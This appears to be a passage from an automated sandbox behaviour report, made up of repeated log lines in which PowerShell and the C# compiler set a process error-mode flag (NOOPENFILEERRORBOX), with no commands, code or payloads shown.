              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
